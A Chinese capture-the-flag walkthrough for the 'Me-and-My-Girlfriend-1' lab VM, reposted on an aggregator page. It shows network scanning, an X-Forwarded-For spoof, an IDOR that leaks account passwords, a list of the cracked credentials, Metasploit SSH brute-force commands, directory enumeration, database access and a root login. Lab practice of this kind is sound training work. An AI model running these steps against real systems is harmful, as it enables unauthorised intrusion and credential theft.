Me-and-My-Girlfriend-1

菜鸟雅痞 / 2023-06-01 / 原文

1.查看kaliIP地址    ifconfig

 2.nmap命令扫描所在网络断的ip即开放端口    nmap 192.168.137.0/24

发现目标主机192.168.137.149    开放了22和80端口

3.直接访问主机地址192.168.137.149

 

4.只能本地访问,设置xff代理尝试登录   X-Forwarded-For

 

 

 

 

添加成功,点IP设置一下

5.设置成功刷新一下,成功显示

注册用户

注册后发现多了user_id=16

通过修改ID获取其他的账户密码

F12修改前端显示将“password”删掉

显示密码

根据显示得到账号密码本

账户:

eweuhtandingan

aingmaung

sundatea

sedihaingmah

alice

abdikasepak

密码:

skuyatuh

qwerty!!!

indONEsia

cedihhihihi

4lic3

dorrrrr

 

因为开放了22端口,利用msfconsole进行ssh爆破

制作密码本

user.txt

 password.txt

search ssh_login

use 0

show options

set rhosts 192.168.137.149

set user_file /home/kali/桌面/user.txt

set pass_file /home/kali/桌面/password.txt

show options

run

 

 

利用22端口使用ssh登录

Ll查看,在.my_secret/下发现flag.txt cat 查看

dirb http://192.168.137.149   目录爆破

得到目录:misc,config;文件:robots.txt,icons/README,heyhoo.txt

 打开 /config/config.php 得到数据库连接的设置:数据库登录的帐密和当前的数据库。

登录数据库

mysql -uroot -pctf_pasti_bisa

show databases;

use ceban_corp

show tables;

select * from tbl_users;

直接su提权 账户 root 密码ctf_pasti_bisa

 

Me-and-My-Girlfriend-1更多相关文章

09-XSS键盘监听、cookie窃取&文件上传绕过

web集群项目-迁移与接入负载

给 WordPress 添加文章浏览量统计功能

RTX5/FreeRTOS全家桶源码工程综合实战模板集成CANopen组件(2024-10-30)

【PHP爬虫的淘宝奇遇记】—— 探索商品类目的“迷宫”

冒险岛V0.79版本单机安装教程_无需虚拟机

微信支付沙箱测试

W1R3S 1.0.1

集合竞价逐笔数据,level2行情接口统计验证

数据库原理实践3

网络安全渗透测试写法

网关

如何防止服务器端的php文件被下载

Zotereo使用

苹果支付对接

docker搭建及优化步骤

PHP中的错误处理最佳实践

nginx rewrite重定向

PHP微优化技巧有哪些

如何保护PHP应用免受SQL注入攻击

随机推荐

验证码处理在自动化测试中的应用

一些学科笑话

NOIP2024模拟赛20 & 11.1 小记

20241101 数据结构与算法期中机试收获

Java,启动!

什么是IT技术

即将到来!

2024/11/1日 日志 关于JavaScript简介&引入方式 以及基础语法的学习

舍得-时间-工作是人的一生最重要的事情-自己要有私房钱-人的一生最重要的事情是书写自己的人生

2.TiUP 部署 DM 集群

原型模式的C++实现

python bytecode解析

09-XSS键盘监听、cookie窃取&文件上传绕过

ubuntu 24.04 部署 mysql 8.4.3 LTS

国标GB28181公网平台LiteGBS国标GB28181视频平台建筑工地无线视频联网监控系统方案

imes完工下线

android 13 更改手机信号调整

BFS(Breath First Search 广度优先搜索)

Visual Studio Code(VSCode)中设置中文界面

影响黄金价格大幅波动的因素主要有哪些?

热门话题

Ethernaut Level 11: Elevator Attack and Blockchain Interaction

快速部署开源spug运维平台的Docker安装指南

驱动调试之printk的原理与使用

计算机思维模型及其应用

华为云发布代码大模型PanGu-Coder2,实现高效代码生成

Linux多硬盘数据存储和分区操作

构建高可用架构: 分层冗余与自动故障转移

LoRA:高效调参的大语言模型适应方法

《分布式系统的基本原理及互联网分层架构的本质》

Hadoop写流程解析

Java架构师的系统架构设计方法论中的规范要点

使用observeDOM解决BetterScroll插件在移动端无法滑动的问题

互联网一致性架构设计实践

高并发系统架构与水平扩展

混合应用的崛起:跨平台开发取代原生应用

  穗舟网 (www.seizhou.com)

本站除标明"本站原创"外所有文章版权归创作人所有,本站不承担任何法律责任和连带责任,如有冒犯请直接联系,我们将立即予以纠正并致歉。

Powered by WordPress  ·  v1.0.0-alpha